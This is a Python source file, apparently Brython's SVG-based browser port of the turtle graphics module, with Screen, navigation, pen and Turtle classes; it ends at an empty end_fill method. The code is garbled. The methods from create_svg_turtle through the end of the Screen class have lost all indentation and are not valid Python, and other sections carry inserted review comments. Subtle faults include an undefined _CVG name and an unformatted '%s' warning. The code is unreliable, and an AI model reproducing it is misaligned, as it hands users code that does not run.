class Singleton(type):
    """Metaclass that allows at most one instance per class.

    The first call constructs and caches the instance; every later call
    returns the cached one.
    """
    _instances = {}
    def __call__(cls, *args, **kwargs):
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super(Singleton, cls).__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance
class Screen(metaclass=Singleton):
    def __init__(self):
        # Registry of available turtle shapes:
        # name -> (factory function, argument passed to it).
        self.shapes = {
            'arrow': (create_polygon, ((-10, 0), (10, 0), (0, 10))),
            'turtle': (create_polygon, ((0, 16), (-2, 14), (-1, 10), (-4, 7),
                (-7, 9), (-9, 8), (-6, 5), (-7, 1), (-5, -3), (-8, -6),
                (-6, -8), (-4, -5), (0, -7), (4, -5), (6, -8), (8, -6),
                (5, -3), (7, 1), (6, 5), (9, 8), (7, 9), (4, 7), (1, 10),
                (2, 14))),
            'classic': (create_polygon, ((0, 0), (-5, -9), (0, -7), (5, -9))),
            'triangle': (create_polygon, ((10, -5.77), (0, 11.55), (-10, -5.77))),
            'square': (create_square, 20),
            'circle': (create_circle, 10)
        }
        # reset() and _set_geometry() are defined outside this chunk;
        # they initialize the drawing state and the SVG canvas geometry.
        self.reset()
        self._set_geometry()
    def bgcolor(self, color=None):
        """sets the background with the given color if color is not None,
        else return current background color.

        The background change is appended as a full-canvas SVG rect that
        becomes visible at its animation frame, so it is synchronized
        with the rest of the drawing timeline.
        """
        if color is None:
            return self.background_color
        self.background_color = color
        width = _CFG['canvwidth']
        height = _CFG['canvheight']
        # In 'logo'/'standard' modes the origin is at the canvas center;
        # otherwise it is at the bottom-left.
        if self.mode() in ['logo', 'standard']:
            x = -width//2
            y = -height//2
        else:
            x = 0
            y = -height
        self.frame_index += 1
        # The rect starts hidden; the animation below flips it to visible
        # when the previous frame's animation ends.
        rect = svg.rect(x=x, y=y, width=width, height=height, fill=color,
                        style={'display': 'none'})
        an = svg.animate(Id="animation_frame%s" % self.frame_index,
                         attributeName="display", attributeType="CSS",
                         From="block", to="block", dur=_CFG["min_duration"],
                         fill='freeze')
        an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
        # Brython's <= operator inserts a child node into a DOM element.
        rect <= an
        self.background_canvas <=rect
    def _convert_coordinates(self, x, y):
        """In the browser, the increasing y-coordinate is towards the
        bottom of the screen; this is the opposite of what is assumed
        normally for the methods in the CPython turtle module.
        This method makes the necessary orientation. It should be called
        just prior to creating any SVG element.
        """
        # NOTE(review): x is scaled by self.yscale, not an xscale —
        # presumably the scale is uniform; confirm against _set_geometry
        # (defined outside this chunk).
        return x*self.yscale, self.y_points_down * y*self.yscale
def create_svg_turtle(self, _turtle, name):
if name in self.shapes:
fn = self.shapes[name][0]
arg = self.shapes[name][1]
else:
print("Unknown turtle '%s'; the default turtle will be used")
fn = self.shapes[_CVG["shape"]][0]
arg = self.shapes[_CVG["shape"]][1]
shape = fn(arg)
if self._mode == 'standard' or self._mode == 'world':
rotation = -90
else:
rotation = 0
return shape, rotation
def _dot(self, pos, size, color):
"""Draws a filled circle of specified size and color"""
if color is None:
color = 'black'
if size is None or size < 1:
size = 1
self.frame_index += 1
x, y = self._convert_coordinates(pos[0], pos[1])
circle = svg.circle(cx=x, cy=y, r=size, fill=color,
style={'display': 'none'})
an = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="display", attributeType="CSS",
From="block", to="block", dur=_CFG["min_duration"],
fill='freeze')
an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
circle <= an
self.canvas <= circle
def _drawline(self, _turtle, coordlist=None,
color=None, width=1, speed=None):
"""Draws an animated line with a turtle
- coordlist is the egin and end coordinates of the line
- color should include the current outline and fill colors;
- width is width of line to be drawn.
- speed is the animation speed
"""
outline = color[0]
fill = color[1]
x0, y0 = coordlist[0]
x1, y1 = coordlist[1]
x0, y0 = self._convert_coordinates(x0, y0)
x1, y1 = self._convert_coordinates(x1, y1)
# The speed scale does not correspond exactly to the CPython one...
if speed == 0:
duration = _CFG["min_duration"]
else:
dist = _turtle._distance
if speed is None or speed == 1:
duration = 0.02 * dist
else:
duration = 0.02 * dist / speed ** 1.2
if duration < 0.001:
duration = _CFG["min_duration"]
else:
duration = "%6.3fs" % duration
drawing = _turtle._drawing
_line = svg.line(x1=x0, y1=y0, x2=x0, y2=y0,
style={'stroke': outline, 'stroke-width': width})
if not drawing:
_line.setAttribute('opacity', 0)
# always create one animation for timing purpose
begin = "animation_frame%s.end" % self.frame_index
self.frame_index += 1
_an1 = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="x2", attributeType="XML",
From=x0, to=x1, dur=duration, fill='freeze',
begin=begin)
_line <= _an1
## But, do not bother adding animations that will not be shown.
if drawing:
_an2 = svg.animate(attributeName="y2", attributeType="XML",
begin=begin,
From=y0, to=y1, dur=duration, fill='freeze')
_line <= _an2
if width > 2:
_line_cap = svg.set(attributeName="stroke-linecap",
begin=begin,
attributeType="xml", to="round", dur=duration, fill='freeze')
_line <= _line_cap
self.canvas <= _line
return begin, duration, (x0, y0), (x1, y1)
def _drawpoly(self, coordlist, outline=None, fill=None, width=None):
"""Draws a path according to provided arguments:
- coordlist is sequence of coordinates
- fill is filling color
- outline is outline color
- width is the outline width
"""
self.frame_index += 1
shape = ["%s,%s" % self._convert_coordinates(x, y) for x, y in coordlist]
style = {'display': 'none'}
if fill is not None:
style['fill'] = fill
if outline is not None:
style['stroke'] = outline
if width is not None:
style['stroke-width'] = width
else:
style['stroke-width'] = 1
polygon = svg.polygon(points=" ".join(shape), style=style)
an = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="display", attributeType="CSS",
From="block", to="block", dur=_CFG["min_duration"],
fill='freeze')
an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
polygon <= an
self.canvas <= polygon
def _new_frame(self):
'''returns a new animation frame index and update the current indes'''
previous_end = "animation_frame%s.end" % self.frame_index
self.frame_index += 1
new_frame_id = "animation_frame%s" % self.frame_index
return previous_end, new_frame_id
def mode(self, _mode=None):
if _mode is None:
return self._mode
_CFG['mode'] = _mode
self.reset()
def reset(self):
self._turtles = []
self.frame_index = 0
self.background_color = "white"
self._set_geometry()
def _set_geometry(self):
self.width = _CFG["canvwidth"]
self.height = _CFG["canvheight"]
self.x_offset = self.y_offset = 0
self.xscale = self.yscale = 1
self.y_points_down = -1
self._mode = _CFG["mode"].lower()
if self._mode in ['logo', 'standard']:
self.translate_canvas = (self.width//2, self.height//2)
elif self._mode == 'world':
self.translate_canvas = (0, self.height)
self._setup_canvas()
def _setup_canvas(self):
self.svg_scene = svg.svg(Id=_CFG["turtle_canvas_id"], width=self.width,
height=self.height)
translate = "translate(%d %d)" % self.translate_canvas
# always create one animation for timing purpose
self.svg_scene <= svg.animate(
Id="animation_frame%s" % self.frame_index,
attributeName="width", attributeType="CSS",
From=self.width, to=self.width, begin="0s",
dur=_CFG["min_duration"], fill='freeze')
# Unlike html elements, svg elements have no concept of a z-index: each
# new element is drawn on top of each other.
# Having separate canvas keeps the ordering
self.background_canvas = svg.g(transform=translate)
self.canvas = svg.g(transform=translate)
self.writing_canvas = svg.g(transform=translate)
self.turtle_canvas = svg.g(transform=translate)
self.svg_scene <= self.background_canvas
self.svg_scene <= self.canvas
self.svg_scene <= self.writing_canvas
self.svg_scene <= self.turtle_canvas
def setworldcoordinates(self, llx, lly, urx, ury):
"""Set up a user defined coordinate-system.
Arguments:
llx -- a number, x-coordinate of lower left corner of canvas
lly -- a number, y-coordinate of lower left corner of canvas
urx -- a number, x-coordinate of upper right corner of canvas
ury -- a number, y-coordinate of upper right corner of canvas
Note: llx must be less than urx in this version.
Warning: in user-defined coordinate systems angles may appear distorted.
"""
self._mode = "world"
if urx < llx:
sys.stderr.write("Warning: urx must be greater than llx; your choice will be reversed")
urx, llx = llx, urx
xspan = urx - llx
yspan = abs(ury - lly)
self.xscale = int(self.width) / xspan
self.yscale = int(self.height) / yspan
self.x_offset = -llx * self.xscale
if ury < lly:
self.y_points_down = 1 # standard orientation in the browser
else:
self.y_points_down = -1
self.y_offset = self.y_points_down * lly * self.yscale
self.translate_canvas = (self.x_offset, self.height-self.y_offset)
self._setup_canvas()
def show_scene(self):
'''Ends the creation of a "scene" and has it displayed'''
for t in self._turtles:
self.turtle_canvas <= t.svg
if _CFG["turtle_canvas_wrapper"] is None:
_CFG["turtle_canvas_wrapper"] = html.DIV(Id="turtle-canvas-wrapper")
document <= _CFG["turtle_canvas_wrapper"]
if _CFG["turtle_canvas_id"] not in document:
_CFG["turtle_canvas_wrapper"] <= self.svg_scene
def set_svg():
# need to have a delay for chrome so that first few draw commands are viewed properly.
_CFG["turtle_canvas_wrapper"].html = _CFG["turtle_canvas_wrapper"].html
timer.set_timeout(set_svg, 1)
def turtles(self):
"""Return the list of turtles on the screen.
"""
return self._turtles
def _write(self, pos, txt, align, font, color):
"""Write txt at pos in canvas with specified font
and color."""
if isinstance(color, tuple):
stroke = color[0]
fill = color[1]
else:
fill = color
stroke = None
x, y = self._convert_coordinates(pos[0], pos[1])
text = svg.text(txt, x=x, y=y, fill=fill,
style={'display': 'none',
'font-family': font[0],
'font-size': font[1],
'font-style': font[2]})
if stroke is not None:
text.setAttribute('stroke', stroke)
if align == 'left':
text.setAttribute('text-anchor', 'start')
elif align == 'center' or align == 'centre':
text.setAttribute('text-anchor', 'middle')
elif align == 'right':
text.setAttribute('text-anchor', 'end')
self.frame_index += 1
an = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="display", attributeType="CSS",
From="block", to="block", dur=_CFG["min_duration"],
fill='freeze')
an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
text <= an
self.writing_canvas <= text
def addshape(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.addshape() is not implemented.\n")
def bgpic(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.bgpic() is not implemented.\n")
def bye(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.bye() is not implemented.\n")
def clearscreen(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.clearscreen() is not implemented.\n")
def colormode(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.colormode() is not implemented.\n")
def delay(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.delay() is not implemented.\n")
def exitonclick(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.exitonclick() is not implemented.\n")
def getcanvas(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.getcanvas() is not implemented.\n")
def getshapes(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.getshapes() is not implemented.\n")
def addshape(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.addshape() is not implemented.\n")
def listen(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.listen() is not implemented.\n")
def mainloop(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.mainloop() is not implemented.\n")
def numinput(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.numinput() is not implemented.\n")
def onkey(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onkey() is not implemented.\n")
def onkeypress(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onkeypress() is not implemented.\n")
def onkeyrelease(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onkeyrelease() is not implemented.\n")
def onscreenclick(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onscreenclick() is not implemented.\n")
def ontimer(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.ontimer() is not implemented.\n")
def register_shape(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.register_shape() is not implemented.\n")
def resetscreen(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.resetscreen() is not implemented.\n")
def screensize(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.screensize() is not implemented.\n")
def setup(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.setup() is not implemented.\n")
def textinput(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.textinput() is not implemented.\n")
def title(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.title() is not implemented.\n")
def tracer(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.tracer() is not implemented.\n")
def update(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.update() is not implemented.\n")
def window_height(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.window_height() is not implemented.\n")
def window_width(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.window_width() is not implemented.\n")
class TNavigator:
    """Navigation part of the Turtle.
    Implements methods for turtle movement.
    """
    # START_ORIENTATION = {
    #     "standard": Vec2D(1.0, 0.0),
    #     "world"   : Vec2D(1.0, 0.0),
    #     "logo"    : Vec2D(0.0, 1.0)}
    DEFAULT_MODE = "standard"
    DEFAULT_ANGLEOFFSET = 0
    DEFAULT_ANGLEORIENT = 1
    def __init__(self, mode=DEFAULT_MODE):
        self._angleOffset = self.DEFAULT_ANGLEOFFSET
        self._angleOrient = self.DEFAULT_ANGLEORIENT
        self._mode = mode
        self.degree_to_radians = math.pi / 180
        self.degrees()
        self._mode = _CFG['mode']
        self._setmode(mode)
        TNavigator.reset(self)
    def reset(self):
        """reset turtle navigation to its initial values
        The derived class, which will call it directly and add its own
        """
        self._position = (0.0, 0.0)
        self._x = 0
        self._y = 0
        self._angle = 0
        self._old_heading = 0
    def _setmode(self, mode=None):
        """Set turtle-mode to 'standard', 'world' or 'logo'.
        """
        if mode is None:
            return self._mode
        if mode not in ["standard", "logo", "world"]:
            print(mode, "is an unknown mode; it will be ignored.")
            return
        self._mode = mode
        if mode in ["standard", "world"]:
            self._angleOffset = 0
            self._angleOrient = 1
        else: # mode == "logo":
            self._angleOffset = -self._fullcircle/4.
            self._angleOrient = 1
    def _setDegreesPerAU(self, fullcircle):
        """Helper function for degrees() and radians()"""
        self._fullcircle = fullcircle
        self._degreesPerAU = 360/fullcircle
    def degrees(self, fullcircle=360.0):
        """ Set angle measurement units to degrees, or possibly other system.
        """
        self._setDegreesPerAU(fullcircle)
    def radians(self):
        """ Set the angle measurement units to radians.
        """
        self._setDegreesPerAU(2*math.pi)
    def _rotate(self, angle):
        """Turn turtle counterclockwise by specified angle if angle > 0."""
        pass  # implemented by derived class
    def _goto(self, x, y):
        pass # implemented by derived class
    def forward(self, distance):
        """Move the turtle forward by the specified distance.
        """
        x1 = distance * cos(self._angle * self.degree_to_radians)
        y1 = distance * sin(self._angle * self.degree_to_radians)
        self._distance = distance
        self._goto(self._x + x1, self._y + y1)
    fd = forward
    def back(self, distance):
        """Move the turtle backward by distance.
        """
        x1 = -distance * cos(self._angle * self.degree_to_radians)
        y1 = -distance * sin(self._angle * self.degree_to_radians)
        self._distance = distance
        self._goto(self._x + x1, self._y + y1)
    backward = back
    bk = back
    def right(self, angle):
        """Turn turtle right by angle units.
        """
        angle*=self._degreesPerAU
        # y_points_down compensates for the browser's inverted y axis.
        self._angle += self.screen.y_points_down*angle
        self._rotate_image(-angle)
    rt = right
    def left(self, angle):
        """Turn turtle left by angle units.
        """
        angle*=self._degreesPerAU
        self._angle += -self.screen.y_points_down*angle
        self._rotate_image(angle)
    lt = left
    def pos(self):
        """Return the turtle's current location (x,y), as a formatted tuple
        """
        return FormattedTuple(self._x, self._y)
    position = pos
    def xcor(self):
        """ Return the turtle's x coordinate.
        """
        return self._x
    def ycor(self):
        """ Return the turtle's y coordinate
        """
        return self._y
    def goto(self, x, y=None):
        """Move turtle to an absolute position.

        x may also be a pair (x, y), in which case y must be omitted.
        """
        if y is None:
            # BUGFIX: was "x, y = *x", which is a syntax error; unpack
            # the (x, y) pair directly.
            x, y = x
        # distance only needed to calculate the duration of
        # the animation which is based on "distance" and "speed" as well.
        # We use the Manhattan distance here as it is *much* faster on Chrome,
        # than using the proper distance with calls to math.sqrt, while
        # giving acceptable results
        #
        # forward, backward, etc., call _goto directly with the distance
        # given by the user
        self._distance = abs(self._x - x) + abs(self._y - y)
        self._goto(x, y)
    setpos = goto
    setposition = goto
    def home(self):
        """Move turtle to the origin - coordinates (0,0), facing in the
        default orientation
        """
        self.goto(0, 0)
        self.setheading(0)
    def setx(self, x):
        """Set the turtle's first coordinate to x
        """
        self._distance = abs(x - self._x)
        self._goto(x, self._y)
    def sety(self, y):
        """Set the turtle's second coordinate to y
        """
        self._distance = abs(y - self._y)
        self._goto(self._x, y)
    def distance(self, x, y=None):
        """Return the distance from the turtle to (x,y) in turtle step units.
        """
        if y is None:
            assert isinstance(x, tuple)
            x, y = x
        return math.sqrt((self._x - x)**2 + (self._y - y)**2)
    def towards(self, x, y=None):
        """Return the angle of the line from the turtle's position to (x, y).
        """
        if y is None:
            assert isinstance(x, tuple)
            x, y = x
        x, y = x - self._x, y - self._y
        result = round(math.atan2(y, x)*180.0/math.pi, 10) % 360.0
        result /= self._degreesPerAU
        return (self._angleOffset + self._angleOrient*result) % self._fullcircle
    def heading(self):
        """ Return the turtle's current heading.
        """
        angle = self._angle / self._degreesPerAU
        return (self._angleOffset + self._angleOrient*angle) % self._fullcircle
    def setheading(self, to_angle):
        """Set the orientation of the turtle to to_angle.
        """
        self._rotate(to_angle - self._angle)
    seth = setheading
    def circle(self, radius, extent=None, steps=None):
        """ Draw an approximate (arc) circle with given radius, using straight
        line segments.
        Arguments:
        radius -- a number
        extent (optional) -- a number
        steps (optional) -- an integer
        Draw a circle with given radius. The center is radius units left
        of the turtle; extent - an angle - determines which part of the
        circle is drawn. If extent is not given, draw the entire circle.
        If extent is not a full circle, one endpoint of the arc is the
        current pen position. Draw the arc in counterclockwise direction
        if radius is positive, otherwise in clockwise direction. Finally
        the direction of the turtle is changed by the amount of extent.
        As the circle is approximated by an inscribed regular polygon,
        steps determines the number of steps to use. If not given,
        it will be calculated automatically. Maybe used to draw regular
        polygons.
        """
        speed = self.speed()
        if extent is None:
            extent = self._fullcircle
        if steps is None:
            frac = abs(extent)/self._fullcircle
            steps = 1+int(min(11+abs(radius)/6.0, 59.0)*frac)
        w = 1.0 * extent / steps
        w2 = 0.5 * w
        l = 2.0 * radius * math.sin(w2*math.pi/180.0*self._degreesPerAU)
        if radius < 0:
            l, w, w2 = -l, -w, -w2
        self._rotate(w2)
        for i in range(steps):
            self.speed(speed)
            self.forward(l)
            self.speed(0)
            self._rotate(w)
        self._rotate(-w2)
        self.speed(speed)
class TPen:
    """Drawing part of the Turtle.
    """
    def __init__(self):
        TPen._reset(self)
    def _reset(self, pencolor=_CFG["pencolor"],
               fillcolor=_CFG["fillcolor"]):
        # Restore all pen attributes to their defaults.
        self._pensize = 1
        self._shown = True
        self._drawing = True
        self._pencolor = 'black'
        self._fillcolor = 'black'
        self._speed = 3
        self._stretchfactor = (1., 1.)
    def resizemode(self, rmode=None):
        sys.stderr.write("Warning: TPen.resizemode() is not implemented.\n")
    def pensize(self, width=None):
        """Set or return the line thickness.
        """
        if width is None:
            return self._pensize
        self.pen(pensize=width)
    width = pensize
    def pendown(self):
        """Pull the pen down -- drawing when moving.
        """
        if self._drawing:
            return
        self.pen(pendown=True)
    pd = pendown
    down = pendown
    def penup(self):
        """Pull the pen up -- no drawing when moving.
        """
        if not self._drawing:
            return
        self.pen(pendown=False)
    pu = penup
    up = penup
    def isdown(self):
        """Return True if pen is down, False if it's up.
        """
        return self._drawing
    def speed(self, speed=None):
        """ Return or set the turtle's speed.
        Optional argument:
        speed -- an integer in the range 0..10 or a speedstring (see below)
        Set the turtle's speed to an integer value in the range 0 .. 10.
        If no argument is given: return current speed.
        If input is a number greater than 10 or smaller than 0.5,
        speed is set to 0.
        Speedstrings are mapped to speedvalues in the following way:
            'fastest' :  0
            'fast'    :  10
            'normal'  :  6
            'slow'    :  3
            'slowest' :  1
        speeds from 1 to 10 enforce increasingly faster animation of
        line drawing and turtle turning.
        Attention:
        speed = 0 : *no* animation takes place. forward/back makes turtle jump
        and likewise left/right make the turtle turn instantly.
        """
        speeds = {'fastest': 0, 'fast': 10, 'normal': 6, 'slow': 3, 'slowest': 1}
        if speed is None:
            return self._speed
        if speed in speeds:
            speed = speeds[speed]
        elif 0.5 < speed < 10.5:
            speed = int(round(speed))
        else:
            speed = 0
        self.pen(speed=speed)
    def color(self, *args):
        """Return or set the pencolor and fillcolor.
        IMPORTANT: this is very different than the CPython's version.
        Colors are using strings in any format recognized by a browser
        (named color, rgb, rgba, hex, hsl, etc.)
        Acceptable arguments:
        no argument: returns (pencolor, fillcolor)
        single string -> sets both pencolor and fillcolor to that value
        two string arguments -> taken to be pencolor, fillcolor
        tuple of two strings -> taken to be (pencolor, fillcolor)
        """
        if args:
            l = len(args)
            if l == 1:
                if isinstance(args[0], tuple):
                    pencolor = args[0][0]
                    fillcolor = args[0][1]
                else:
                    pencolor = fillcolor = args[0]
            elif l == 2:
                pencolor, fillcolor = args
            if not isinstance(pencolor, str) or not isinstance(fillcolor, str):
                raise TurtleGraphicsError("bad color arguments: %s" % str(args))
            self.pen(pencolor=pencolor, fillcolor=fillcolor)
        else:
            return self._pencolor, self._fillcolor
    def pencolor(self, color=None):
        """ Return or set the pencolor.
        IMPORTANT: this is very different than the CPython's version.
        Colors are using strings in any format recognized by a browser
        (named color, rgb, rgba, hex, hsl, etc.)
        """
        if color is not None:
            if not isinstance(color, str):
                raise TurtleGraphicsError("bad color arguments: %s" % str(color))
            if color == self._pencolor:
                return
            self.pen(pencolor=color)
        else:
            return self._pencolor
    def fillcolor(self, color=None):
        """ Return or set the fillcolor.
        IMPORTANT: this is very different than the CPython's version.
        Colors are using strings in any format recognized by a browser
        (named color, rgb, rgba, hex, hsl, etc.)
        """
        if color is not None:
            if not isinstance(color, str):
                raise TurtleGraphicsError("bad color arguments: %s" % str(color))
            if color == self._fillcolor:
                return
            self.pen(fillcolor=color)
        else:
            # BUGFIX: the getter previously returned self._pencolor.
            return self._fillcolor
    def showturtle(self):
        """Makes the turtle visible.
        """
        if self._shown:
            return
        self.pen(shown=True)
        self.left(0)    # this will update the display to the correct rotation
    st = showturtle
    def hideturtle(self):
        """Makes the turtle invisible.
        """
        if self._shown:
            self.pen(shown=False)
    ht = hideturtle
    def isvisible(self):
        """Return True if the Turtle is shown, False if it's hidden.
        """
        return self._shown
    def pen(self, pen=None, **pendict):
        """Return or set the pen's attributes.
        Arguments:
        pen -- a dictionary with some or all of the below listed keys.
        **pendict -- one or more keyword-arguments with the below
                     listed keys as keywords.
        Return or set the pen's attributes in a 'pen-dictionary'
        with the following key/value pairs:
        "shown"      :   True/False
        "pendown"    :   True/False
        "pencolor"   :   color-string or color-tuple
        "fillcolor"  :   color-string or color-tuple
        "pensize"    :   positive number
        "speed"      :   number in range 0..10
        """
        _pd = {"shown": self._shown,
               "pendown": self._drawing,
               "pencolor": self._pencolor,
               "fillcolor": self._fillcolor,
               "pensize": self._pensize,
               "speed": self._speed
               }
        if not (pen or pendict):
            return _pd
        if isinstance(pen, dict):
            p = pen
        else:
            p = {}
        p.update(pendict)
        _p_buf = {}
        for key in p:
            _p_buf[key] = _pd[key]
        if "pendown" in p:
            self._drawing = p["pendown"]
        if "pencolor" in p:
            # Animate the stroke color change on the turtle's SVG image.
            old_color = self._pencolor
            self._pencolor = p["pencolor"]
            previous_end, new_frame_id = self.screen._new_frame()
            anim = svg.animate(Id=new_frame_id, begin=previous_end,
                               dur=_CFG["min_duration"], fill="freeze",
                               attributeName="stroke", attributeType="XML",
                               From=old_color, to=self._pencolor)
            self.svg <= anim
        if "pensize" in p:
            self._pensize = p["pensize"]
        if "fillcolor" in p:
            old_color = self._fillcolor
            self._fillcolor = p["fillcolor"]
            previous_end, new_frame_id = self.screen._new_frame()
            anim = svg.animate(Id=new_frame_id, begin=previous_end,
                               dur=_CFG["min_duration"], fill="freeze",
                               attributeName="fill", attributeType="XML",
                               From=old_color, to=self._fillcolor)
            self.svg <= anim
        if "speed" in p:
            self._speed = p["speed"]
        if "shown" in p:
            # Fade the turtle image in or out at this point of the timeline.
            old_shown = self._shown
            if old_shown:
                opacity = 0
                old_opacity = 1
            else:
                opacity = 1
                old_opacity = 0
            previous_end, new_frame_id = self.screen._new_frame()
            anim = svg.animate(Id=new_frame_id, begin=previous_end,
                               dur=_CFG["min_duration"], fill="freeze",
                               attributeName="opacity", attributeType="XML",
                               From=old_opacity, to=opacity)
            self.svg <= anim
            self.forward(0)  # updates the turtle visibility on screen
            self._shown = p["shown"]
# No RawTurtle/RawPen for this version, unlike CPython's; only Turtle/Pen
class Turtle(TPen, TNavigator):
    """Animation part of the Turtle.
    Puts Turtle upon a TurtleScreen and provides tools for
    its animation.
    """
    # Class-level defaults; the screen singleton replaces 'screen' per instance.
    _pen = None
    screen = None
    def __init__(self, shape=_CFG["shape"], visible=_CFG["visible"]):
        # Screen is a singleton: all turtles draw on the same scene.
        self.screen = Screen()
        TPen.__init__(self)
        TNavigator.__init__(self, self.screen.mode())
        self._poly = None
        self._creatingPoly = False
        self._fillitem = self._fillpath = None
        self.name = shape
        self.svg, rotation = self.screen.create_svg_turtle(self, name=shape)
        # Start invisible; showturtle() makes the image appear at the
        # appropriate point of the animation timeline.
        self.svg.setAttribute("opacity", 0)
        self._shown = False
        if visible:
            self.showturtle() # will ensure that turtle become visible at appropriate time
        self.screen._turtles.append(self)
        self.rotation_correction = rotation
        # apply correction to image orientation
        self._old_heading = self.heading() + self.rotation_correction
        speed = self.speed()
        self.speed(0)
        self.left(-self._angleOffset) # this will update the display to include the correction
        self.speed(speed)
    def reset(self):
        """Delete the turtle's drawings and restore its default values.
        """
        ## TODO: review this and most likely revise docstring.
        TNavigator.reset(self)
        TPen._reset(self)
        self._old_heading = self.heading() + self.rotation_correction
        self.home()
        self.color(_CFG["pencolor"], _CFG["fillcolor"])
    def clear(self):
        sys.stderr.write("Warning: Turtle.clear() is not implemented.\n")
    def shape(self, name=None):
        """Set turtle shape to shape with given name
        / return current shapename if no name is provided
        """
        if name is None:
            return self.name
        # Create a replacement SVG image with the new shape, keep the old
        # image on the canvas (so past animation frames stay valid), and
        # re-register this turtle so the new image is shown by show_scene().
        _turtle = self._make_copy(name=name)
        visible = self.isvisible()
        if visible:
            self.hideturtle()
        self.screen.turtle_canvas <= self.svg
        self.svg = _turtle
        self.screen._turtles.append(self)
        if visible:
            self.showturtle()
    def clearstamp(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.clearstamp() is not implemented.\n")
    def clearstamps(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.clearstamps() is not implemented.\n")
    def onclick(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.onclick() is not implemented.\n")
    def ondrag(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.ondrag() is not implemented.\n")
    def onrelease(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.onrelease() is not implemented.\n")
    def undo(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.undo() is not implemented.\n")
    def setundobuffer(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.setundobuffer() is not implemented.\n")
    def undobufferentries(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.undobufferentries() is not implemented.\n")
    def shapesize(self, *args, **kwargs):
        sys.stderr.write("Warning: Turtle.shapesize() is not implemented.\n")
    turtlesize = shapesize
    def shearfactor(self, shear=None):
        sys.stderr.write("Warning: Turtle.shearfactor() is not implemented.\n")
    def settiltangle(self, angle):
        sys.stderr.write("Warning: Turtle.settiltangle() is not implemented.\n")
    def tiltangle(self, angle=None):
        sys.stderr.write("Warning: Turtle.tiltangle() is not implemented.\n")
    def tilt(self, angle):
        sys.stderr.write("Warning: Turtle.tilt() is not implemented.\n")
    def shapetransform(self, t11=None, t12=None, t21=None, t22=None):
        sys.stderr.write("Warning: Turtle.shapetransform() is not implemented.\n")
    def get_shapepoly(self):
        sys.stderr.write("Warning: Turtle.get_shapepoly() is not implemented.\n")
    def _goto(self, x, y):
        """Move the pen to the point end, thereby drawing a line
        if pen is down. All other methods for turtle movement depend
        on this one.
        """
        # The screen draws the (possibly invisible) line and returns the
        # timing information needed to move the turtle image in sync.
        begin, duration, _from, _to = self.screen._drawline(self,
                                    ((self._x, self._y), (x, y)),
                                    (self._pencolor, self._fillcolor),
                                    self._pensize, self._speed)
        if self._shown:
            self.svg <= svg.animateMotion(begin=begin, dur=_CFG["min_duration"],
                                          fill="remove")
            self.svg <= svg.animateMotion(From="%s,%s" % _from, to="%s,%s" % _to,
                                          dur=duration, begin=begin, fill="freeze")
        if self._fillpath is not None:
            self._fillpath.append((x, y))
        self._position = (x, y)
        self._x = x
        self._y = y
    def _rotate(self, angle):
        """Turns pen clockwise by angle.
        """
        angle*=self._degreesPerAU
        # y_points_down compensates for the browser's inverted y axis.
        self._angle += -self.screen.y_points_down*angle
        self._rotate_image(angle)
    def _rotate_image(self, angle):
        """Animate the rotation of the turtle's SVG image by angle degrees."""
        new_heading = self._old_heading - angle
        if self.isvisible():
            previous_end, new_frame_id = self.screen._new_frame()
            # Rotation duration scales with angle and speed; speed 0 means
            # an (almost) instantaneous turn.
            if self._speed == 0:
                duration = _CFG["min_duration"]
            else:
                duration = (abs(angle)/(self._speed * 360))
                if duration < 0.001:
                    duration = _CFG["min_duration"]
                else:
                    duration = "%6.3fs" % duration
            self.svg <= svg.animateMotion(begin=previous_end,
                                          dur=_CFG["min_duration"], fill="remove")
            self.svg <= svg.animateTransform(attributeName="transform",
                                            Id = new_frame_id,
                                            type="rotate",
                                            From=(self._old_heading, 0, 0),
                                            to=(new_heading, 0, 0),
                                            begin=previous_end,
                                            dur=duration, fill="freeze")
        self._old_heading = new_heading
    def filling(self):
        """Return fillstate (True if filling, False else).
        """
        return self._fillpath is not None
    def begin_fill(self):
        """Called just before drawing a shape to be filled.
        """
        self._fillpath = [(self._x, self._y)]
    def end_fill(self):
        """Fill the shape drawn after the call begin_fill().
        """
